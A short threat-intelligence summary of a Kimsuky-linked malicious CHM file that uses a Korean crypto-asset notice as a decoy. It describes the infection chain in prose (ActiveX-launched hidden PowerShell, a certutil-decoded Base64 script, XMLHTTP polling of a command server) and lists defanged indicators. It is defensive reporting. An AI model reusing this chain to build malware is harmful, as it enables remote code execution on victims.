A Kimsuky-linked CHM file named SecurityMail.chm presents a Korean virtual-asset user-protection notice as a decoy while hiding malicious execution logic inside the compiled HTML help content. The embedded HTML abuses an ActiveX object to launch hidden PowerShell, writes a Base64 payload into the user's Links directory, decodes it with certutil, and runs the resulting script with wscript. The decoded script creates a Microsoft.XMLHTTP object, requests commands from noreplymail[.]space under the BitJoker path with a randomized tag parameter, and executes the server response, enabling remote code execution and follow-on command delivery. The lure content and the author's assessment point to possible cryptocurrency-related targeting, while the infrastructure note links the domain to 46.202.158[.]9 and prior Konni-associated URL usage.